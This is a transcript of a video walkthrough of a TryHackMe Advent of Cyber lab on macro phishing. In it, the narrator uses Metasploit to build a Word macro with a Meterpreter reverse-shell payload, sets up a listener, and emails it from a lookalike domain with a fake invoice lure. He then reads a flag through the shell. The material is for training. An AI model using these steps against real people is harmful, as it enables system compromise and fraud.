Welcome back with another video on this channel. I'm Zaheen Nazir and we are doing Advent of Cyber 2024 on TryHackMe.com. So this is task 16, day 10. We had a brain full of macros and had shells in his soul. So there is already a walkthrough by this guy, Gerald Ugar, PhD. Alright, so let's continue. We're gonna create our own walkthrough here. Mere malware had just one sock mask. Wish the sock organizer would fall for his fish. Well, on top of this, we wanted as well, once the email opened, to gain a reverse shell or rev shell. Mere malware attempts to phish one of the sock mask organizer by sending a document embedded with a malicious macro. Once opened, the macro will execute, giving the mere malware remote access to the organization system. So phish is a term we use to trick somebody to do something which they should not. Okay, so this is what we call phishing. So phishing could have different types. For example, spearhead phishing. So most of the organization have their C-level executives, CEOs, CISO, Chief Security Officer, or something like that. So what they do is the attackers will gather the data about them and then target these particular individuals to get their credentials or get the remote access to their systems. Okay, so this is what we call phish. So the one very famous way to do this phishing is to send a document which have some kind of macro enabled and through an email. And once the victim will open the email, basically it will perform some kind of operation without victim's knowledge, and this will basically compromise the system. So in our case, we're gonna get the remote access. Okay, so we know that from the advent of Cyber 2024, from all previous tasks that we have done, and mere malware is the true evil in Ware Valley town. Okay, so let's get started. We have Martha May Ware is surprised that her system was compromised even after following tight security, but Max KD thinks she traced the attacker. He got in. It's none other than the mayor malware who got into the system. This time the mayor used phishing to get his victim. Max KD. A quick incident response prevented significant damage. Okay, we'll see. In this task, you will run a security assessment against Martha May, where the purpose would be to improve her security and raise her cybersecurity awareness against future attacks. Glitch is still concerned about any future attack on Martha May Ware, and she have May, right? So Mayor malware and the May Ware, okay, sound synonymous, and advises MaxKitty to run a phishing exercise on her to verify whether she is vigilant about these attacks. Okay, learning objectives: understand how phishing attacks work. Awesome. Discover how macros in documents can be used and abused. Learn how to carry out a phishing attack with a macro. Okay, we'll do all of this. Phishing attack. So we have a definition for phishing as well: when emails are sent to a target or victim purporting to be from a trusted entity to lure individual into providing sensitive information. That is true. Okay, security is as strong as the weakest link. So the chain is as strong as the weakest link in the chain. So same is true for security as well. Many would argue that humans are the weakest link in the security chain. Is it easier to exploit a patch system behind a firewall or to convince a user to open an important document? I think document, of course. Hence, the human hacking is usually the easiest to accomplish and falls under social engineering. So, social engineering is basically doing human hacking, somebody trying to trick somebody, human, to do some steps in order to compromise them. Okay. Phishing is a play on the word fishing. However, the attacker is not after seafood. Phishing works by sending a bait to a usually large group of target users. Yeah. If you want to be caught, yeah, this is the way to go. Otherwise, nowadays people are going with the spear phishing attacks. Basically high value targets only. Furthermore, the attacker often craft their messages with a sense of urgency, prompting target users to take immediate action without thinking critically, increasing the chances of success. The purpose is to steal personal information or install malware, usually by convincing the target user to fill out a form, open a file, or click a link. So, for example, they can send an email that I'm from your IT support and I want your system is compromised. We need to reset your password. So please click on this link and reset your password. Okay. So they will show you 3 fields: current password and the password you want to reset. Once you submit, they will have your current password and they can try to trick or compromise your system from there, unless you have implemented multi-factor authentication. And if they don't consider the multi-factor authentication in their attack, that means there is less chance your systems will be compromised to up to that level. Okay, so that's why the multi-factor authentication is very important and should be enabled by default. One might get an email out of nowhere claiming that they are being charged a hefty sum and that they should check the details in the attached file or URL. The attacker just need to have their target users open the malicious file or view the malicious link. This can trigger specific actions that would give the attacker control over your system. Yeah, that is very true. And you never know about the 0 days. Some of the attacks can be mitigated while your security software is running on your system. It will prompt that, okay, this particular exe file is suspicious and you should consider it, or we are warning you to not to open it. Okay, so by that you will be able to see, okay, this file have some kind of macro which it should not have. Okay, there is a warning, and if this threat is already there as a signature into the antiviruses or any security solutions that you are using, it will basically not run and it will try to isolate it and quarantine it. Okay, so there are a lot of techniques which basically can reuse this similar kind of macro or the code and basically try to encrypt it or try to encode it in a different way that the signature will be different than the actual signature that the antivirus have. So this way the hackers or the people or the attacker can evade the defenses of your systems. So we have macros. The needs of MS Office users can be vastly different, and there is no way that a default installation would cater to all of these needs. In particular, some users find themselves repeating the same tasks such as formatting and insert text or performing calculations. Consider the example of number to words conversion, where a number such as 1337 needs to be expressed as a 1337. It would take hours to finish if you have hundreds of numbers to convert. Hence, there is a need for an automated solution to save time and reduce manual effort. So basically, you have some way to program your Word file, and many Microsoft products using macros. In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. MS Word among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cybersecurity, these automated programs can be hijacked for malicious purposes. That is very true. To add a macro to an MS Word document, for instance, we can click on the view menu and then select macro as pointed out by 1 and 2 in the screenshot below. So how to avoid this macro whatnot? So you can have some kind of sanitization solution. So what happens is this solution will scan your files and try to rebuild your file from scratch, and if there is any kind of binded elements into that document, the scanning solution will basically disregard it. Okay, and once this file is scanned, the saved file after the scan will not have this kind of macros attached to it. Okay, so this is another very effective way to do that. There are many solutions available. Just check it out or search on the internet which solution is compatible with your product line. In the screenshot below, we should specify the name of the macro and specify what we want to save it in our current document as indicated by 3 and 4. Finally, we press create. Let's see what we have here. We have document 1 in the view pane. We have macros here. We click on the macro button here, mention the macro name and the document it should be in same document, and then we click on create. Let's explore one way the attacker could have created an MS Word document with an embedded macro to gain access to the Martha system. Attack plan. Okay, so this is the attack plan. In this plan, in his plans, mere malware needs to create a document with a malicious macro. Upon opening the document, the macro will execute a payload and connect to the mayor's machine, giving him remote control. Okay, as a reverse shell, I mean. Consequently, the mayor needs to ensure that he is listening for incoming connections on his machine before emailing the malicious document to Martha Mayware. By executing the macro, the mayor gains remote access to Martha's system through a reverse shell, allowing him to execute commands and control her machine remotely. The steps are as follows. The first one is create a document with the malicious macro. Second one is start listening for incoming connections on the attacker system. Third, email the document and wait for the target user to open it. Fourth, the target user opens the document and connects to the attacker system. Fifth is control the target user system. Okay. You might wonder why you don't set the malicious macro so that you can connect to target machine directly instead of other way around. The reason is that when the target system is behind a firewall or has a private IP address, you cannot reach it and hence cannot connect to it. This is also true vice versa. So if the target system is behind the firewall, that means they could have blocked the incoming connections, and also they could have filtered the outgoing connections as well. Okay, this is very important. So if you are exposing your attack box IP address, that means they will have some kind of log to pinpoint who is the attacker himself, and that's why people go through Tor or some kind of proxies or domains in order to hide their actual IP address. So this is the emulation that we are doing, so that's why we are exposing our attack box IP directly. Connecting to the machine. Before moving forward, review the questions in the connection and shown below. We need to start attack box. I already did so. Here we go. And we do need to start a VM, so I did start the VM already. Alright, on the attack box, you need to carry out 2 steps. Create a document with an embedded malicious macro. Listen for incoming connections. So sure, we're gonna do that. Creating the malicious document. The first step would be to embed a malicious macro within the document. Alternatively, you can use the meta-exploit framework to create such a document, as this would spare us the need for a system with the MS Office. That is true, because on the Kali Linux we have LibreOffice, not the MS Office. So in order to work with MS Office, I think we need to have the MS Office installed on the Linux system. We'll use the meta-exploit framework to create the document with the malicious macro. This requires the following commands: open a terminal window and run ms console to start the meta-exploit framework. Okay, let's do that. Let me zoom in. So I think I say it is MSF console, and it is 2 weeks old, but it's okay. Still gonna use it. Let it run. Set the payload to Windows interpreter reverse TCP. Specifies the payload to use. In this case, it connects to the specified host and create a reverse shell. Okay, so this is the command. Either you can copy paste it, or let's try to type it. So we'll build the muscle memory and we will learn the command itself for future use. Okay, so my meta exploit framework is still loading, and as you can see, all right. It is almost done. Okay, set payload. I think it was Windows. I don't see the console itself. Maybe, yeah. Now it is available. Set payload. Then we have Windows. Let's try it. Windows. I don't have any kind of autocomplete interpreter. Then reverse. Okay. Reverse underscore TCP. Okay. What we have here? So we have this thing here. Use the exploit multi-file format office underscore word underscore macro. Specify the exploit you want to use. Technically speaking, this is not an exploit, it is a module to create a document with the macro. Okay, so these are the commands that they are executing. So we already executed this one, the first one. Now we need to use the use exploit multi-file format office word. Okay, use why it is not working, guys? What happened? It just gave up, man. Yeah, wait. Oh, okay. Use exploit Next one is multi-file format. Multi-file format. Office underscore word underscore macro. Hill to load. Do I need to use exploits? Why it did not work? Let's copy basic one. What did we? Yeah, exploit. The spelling of exploit is not correct. Okay. Next is we need to configure the L host and L port. This is the same that they have mentioned it here. So our IP address is this one. That L host. So it is 10.10.178. For you, it will be different. So try to type your IP address here. Set L port. So let's go with the Tetra 8. Okay. So before we do anything, we need to run our own listening server on this port. So in order to get the connection once we run this macro, all right. Set the L host to specific IP address of the attacker machine. We've done so. Set the L port to Tetra. We have done so as well. Show the options. Show the configuration options to ensure that everything has been set properly. The IP address and the port number in this example. Exploit, generate a macro and embeds it in a document. Exit to quit and return to the terminal. Okay. We'll do show options. It will basically list down all the things that we have. So the IP address is correct, as you can see here. 10.10.178.165 and port is Tetra 8. Everything looks good. Now the next thing that we need to do is click on exploit and it will generate everything for us. Okay. Exploit. Okay, so it generated the particular document here. Let's open it. Open the root and put the directory here. So here is the template.docx file, the docx, which is the latest format of the Word file. Very good. Okay, as you can see, the Word document with the embedded macro was created and stored in the root. For us, this is different. The created macro enabled document. We mentioned earlier how to create a macro within an MS Word document. You might be interested to see the contents of the file created by the MSF console. In the screenshot below, we can see the different procedures and functions that make up this macro. Note the attack box doesn't have MS Office installed, so for this section, you only have to read along. Okay. So if we have, for example, Microsoft Visual Basic for application installed, we can basically open this particular Word file and we will be able to see the new macro here. Okay, because it is written in the Visual Basic, I think. Yeah, we are using the sub and public and whatnot, as you can see here. You can also write, I think, in C# as well, but I'm not that confident if it is possible. but most of the macro are written on the Visual Basic. So we have auto open. Where is the auto open? I don't see it anywhere. We have Python code create. Yeah, auto open here. Triggers the macro automatically when a Word document is opened. It searches through the document's properties and looking for content in the comments field. The data saved using base64 encoding in the comments field is actually the payload. Okay, so our payload is hidden in the, not hidden, but it is there in the comment section. So yeah, okay, so it will go through the each property, and one of the property will name comments, and from comments we are reading our payload here. Very clever. Base64 decode converts the payload to its original form. In this case, it is an executable MS Windows file. Wow. Execute for Windows executes the payload in a temporary directory. It connects to specified attacker system, IP address, and port. So the temporary directory is a temp folder on your C drive, and anybody can write anything in your temp folder. So this is what we are using to execute our exe file here, as you can see in this particular execute for Windows. The command field is shown in the screenshot below. It is close to 100,000 characters in our case. Wow, the command is pretty long. If you copy it and save it into a text file, you can convert it to its original executable format using base64 as shown below. You can notice the size of this file. Wow, big one. 73K payload.exe. Wow. You already expect this file to connect to the specified IP address and port. If you would like to check its behavior in a sandbox, you can check the virus folder report. Yeah, let's check it out. So it is detected because the signature is of meta exploit. So it is detected by 65 out of 72. And they are saying that security vendors flagged this file as malicious, so it is already a malicious file. Wow. Good. In this case, it attempts to connect to 10, 9, 18, and 120. Pilot actions. So this is activity. Malware. So this is the IP traffic. I don't know from where they took it. And for us, it is trying to connect to here. And what is the actual information you can give us? I don't see the IP. Probably don't see the IP address traffic here, but they are saying that there is a lot of traffic. It usually come on this particular IP address. Network communication. Okay, let's continue. Listening for incoming connections. We again will use the Metasploit framework, but this time to listen for incoming connections when a target user opens our phishing Word document. This requires the following commands: open a new terminal window and run MSF console to start the Metasploit framework. Let's do that. In the meantime, here, let me make a little bit bigger. Yeah, Control++ is not working directly. I don't know why. Yeah, now it is working. Awesome. Okay. Massive console. Let's run it. We can run 2 instances at the same time. Alright. Let me exit this one to save memory. Alright. So here I use multi-handler to handle the incoming connection. Use multi /handler. Use multi /handler. Okay, we did so. What else? Set the payload to Windows Metaperator reverse underscore TCP. Okay. Reverse underscore TCP. So it is reverse underscore TCP. Yeah, reverse underscore TCP. Okay, it is set. Now set the L host with the specific IP address and okay, show options to confirm the values of and start listening to the incoming section. Okay, so in this case we do need to do the same thing. Specify the IP address with the attacker system, so our own IP address. Okay, I don't know why we need to repeat all of this, and should have done this before, right? Okay, so let's do the show options first to see the options we have. We need to set the L host and L port here. As you can see, L port is already set with the Tetra 4. We need to modify all of these values. So let's set L host with the IP address 10.10.178.165. Then set L port, which is Tetra 8, and exploit. Once you do the exploit, it will basically run and start listening. Yeah. Set a reverse TCP handler on this particular IP address and port, which is good. All right. Email the attachment. Email the malicious document. The malicious document has been created. All you need to do is to send it to the target user. It is time to send an email to the target user, which is martha@sockmas.thm. Malware has prepared the following credentials. So the email is this one and password is this one. Notice how malware uses a domain name that looks similar to the target's user. This technique is known as typo squatting. Sockmas and Socknas. Oh wow. Where the attacker create domain names that are nearly identical to the legitimate ones in order to trick victims. On the attack box, start the Firefox web browser and head to this particular IP address. Why we need to go to that particular IP address? 10.10.137.60. Is it the... Yeah, okay, this is our VM itself. Okay, get it. So here we go. So this is the VM that we already started. For you, this IP address will be different. Let me open the Firefox here. Hopefully this will open today. Okay. So let me go to this particular IP address, which is our VM. It is loading, and we need to use this particular information to log in. Let me go with the remember login and paste here. Click on sign in, not for now. Okay, so here is how we're gonna send a new message. Click on the new message, and we need to from is nos socknas, and we need to send it to Martha. So here we go. Okay, so once logged in, compose an email to the target user, and don't forget to attach the document you created, changing the name to something more convincing, such as invoice.docm or zip.m might be a good idea. Also, write a couple of sentences explaining what you are attaching to convince Martha May where to open the document. Note, you can use Ctrl-H on the file upload pop-up to be able to see the MSF4 directory where our email attachment is located. Okay, so let's go to the folder that we already. I don't know why we need to go with the docm file. Let's go with the invoice. Where is the rename? Here we go. So let's go with invoice. Here we go. Invoice. Hi, Martha. This is to inform you that your subscription will be renewed today, charging $12,000. Please find attached invoice for your reference. Okay, records sock nas. Okay, not this sock nas. Let's attach the file here. So file is available here. Copy. There is OPT Metaxploit framework embedded. How I can go directly there. Other location. OPT Metaxploit framework embedded. Framework, I think. Embedded framework data exploits, and then the actual folder name, which is office word macro. Just office word macro. Here we go, and here is our invoice.docs file. Open it, and now we can send our email. So we have sent our email now, and hopefully we will get our reverse shell here. Let's see. Okay, if everything works out, we will get a reverse shell after about 2 minutes. You can access the files and folders on the target system via the command line. You can use cat to display any text file. Okay, what is the flag value inside the flag.txt file that's located on the administrator's desktop? Sure. We haven't received anything yet. Wait a moment, we already had opened the web browser. We had sent the email to Martha with the invoice.docx file. Do we need to send the docm file here? MSF4 directory. Just checking. So I will be back once I get the reverse shell. I'm back. I did not get any kind of reverse shell because we made a mistake. So instead of sending this particular file, we sent the temp.docs file. Okay, so that was the first mistake, and we kind of reminded here that you can use invoice.docm instead of x here. So let's do that. Let's do one more time. So here is our file. Let's open it in the Explorer here. So let's make this one rename invoice. So we kind of lost our let's edit as new. So here we go. So let me remove this file and let me copy and drag this file here. Okay, good. Everything looks good. Let's send this one. Thank you for your email. I'm checking the attachment right now. So we received a message from her as well. So hopefully we'll receive the reverse shell as well here about in 2 minutes. So we did the thing and we get the message here as well. This was 6 minutes ago. Yeah, we got the reverse shell here. Awesome. So let's see. Can we do ls here? Okay. We have a lot of things here. So let's see. So okay. Let's see what in which directory we are. pwd. So in the system32. Alright, so this is not the directory we are looking for, I think. We need to read something from the administrator desktop, right? Users desktop. So let's take this one, copy. So put it here, desktop, and let's see what files we have here. We have flag.txt. Just do the flag.txt, so interpreter will automatically convert the relevant command, and here we go. So here is our flag here. Awesome, awesome, awesome. And with that, we have completed our task 16. So thank you guys for joining me. If you like this video, please give it a thumbs up. If you did not subscribe yet, please subscribe to the channel. Help us build the community. And if you have any kind of comments, positive or negative, please mention in the comment section down below, and I will see you in the next video. Bye bye.